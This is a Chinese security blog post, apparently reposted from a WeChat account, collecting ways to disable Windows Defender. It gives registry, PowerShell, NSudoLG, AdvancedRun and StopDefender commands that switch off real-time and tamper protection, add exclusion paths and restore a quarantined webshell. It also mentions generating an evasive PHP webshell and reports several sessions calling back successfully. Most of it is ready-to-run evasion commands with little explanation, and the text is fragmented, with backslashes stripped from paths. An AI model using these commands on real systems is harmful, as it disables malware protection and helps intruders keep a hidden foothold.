声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
(2)系统补丁信息
(3)systeminfo 信息
PHP_XOR_BASE64加密器即可免杀(php一句话直接杀),生成 PHP_XOR_BASE64 webshell
静态免杀测试
连接webshell
动态免杀测试
cmd
#查看排除项reg query "HKLMSOFTWAREMicrosoftWindows DefenderExclusions" /s#查看版本dir "C:ProgramDataMicrosoftWindows DefenderPlatform" /od /ad /b#查看篡改保护(返回结果中的 数值5代表开启,数值4代表关闭)reg query "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows DefenderFeatures" /v "TamperProtection"#需要TrustedInstaller权限##cmd注册表关闭Windows defenderreg add "HKLMSOFTWAREMicrosoftWindows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f##cmd关闭篡改保护NSudoLG.exe -U:T cmd /c "reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows DefenderFeatures" /v "TamperProtection" /d 4 /t REG_DWORD /f"##cmd注册表恢复Windows defenderreg add "HKLMSOFTWAREMicrosoftWindows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f##cmd添加Windows defender排除项reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows DefenderExclusionsPaths" /v "c:temp" /d 0 /t REG_DWORD /f
powershell
#查看排除项Get-MpPreference | select ExclusionPath#关闭Windows defenderSet-MpPreference -DisableRealTimeMonitoring $true#增加排除项Add-MpPreference -ExclusionPath "c:temp"#删除排除项Remove-MpPreference -ExclusionPath "C:test"#关闭实时保护Set-MpPreference -DisableRealtimeMonitoring $true
(1)NSudoLG
免杀测试
使用方法
#cmd注册表关闭Windows defenderreg add "HKLMSOFTWAREMicrosoftWindows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f#cmd注册表恢复Windows defenderreg add "HKLMSOFTWAREMicrosoftWindows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f#cmd添加Windows defender排除项reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows DefenderExclusionsPaths" /v "c:temp" /d 0 /t REG_DWORD /f#NSudoLG.exe关闭Windows defenderNSudoLG.exe -U:T cmd /c "reg add "HKLMSOFTWAREMicrosoftWindows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f"#NSudoLG.exe恢复Windows defenderNSudoLG.exe -U:T cmd /c "reg add "HKLMSOFTWAREMicrosoftWindows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f"#NSudoLG.exe添加Windows defender排除项NSudoLG.exe -U:T cmd /c "reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows DefenderExclusionsPaths" /v "c:temp" /d 0 /t REG_DWORD /f"
powershell成功上线
(2)AdvancedRun
免杀测试
使用方法
AdvancedRun.exe /EXEFilename "%windir%system32cmd.exe" /CommandLine '/creg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows DefenderReal-Time Protection" /v "DisableRealtimeMonitoring" /d 1 /t REG_DWORD /f' /RunAs 8 /Run
powershell成功上线
(3)StopDefender
免杀测试
使用方法
StopDefender_x64.exe
powershell成功上线
powershell
#查看排除项Get-MpPreference | select ExclusionPath#关闭Windows defenderSet-MpPreference -DisableRealTimeMonitoring $true#增加排除项Add-MpPreference -ExclusionPath "c:temp"#删除排除项Remove-MpPreference -ExclusionPath "C:test"
关闭 Windows defender
关闭 实时保护
Set-MpPreference -DisableRealtimeMonitoring $true
(4)MpCmdRun介绍
C:ProgramDataMicrosoftWindows DefenderPlatform<antimalware platform version>#查看版本(查看<antimalware platform version>):ProgramDataMicrosoftWindows DefenderPlatform" /od /ad /b#验证dir "C:ProgramDataMicrosoftWindows DefenderPlatform4.18.2210.6-0" | findstr MpCmdRun
基础命令
#查看被隔离的文件列表MpCmdRun -Restore -ListAll#恢复指定名称的文件至原目录MpCmdRun -Restore -FilePath C:phpstudy_proWWWshell.php#恢复所有文件至原目录MpCmdRun -Restore -All#查看指定路径是否位于排除列表中MpCmdRun -CheckExclusion -path C:phpstudy_proWWW
移除Token导致Windows Defender失效
工具地址
参考文章
-END-
▎经典文章精选
扫描下方 二维码 加入我们吧!
原文始发于微信公众号(betasec):安全攻防 | 多种方式关闭讨厌的defender!
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论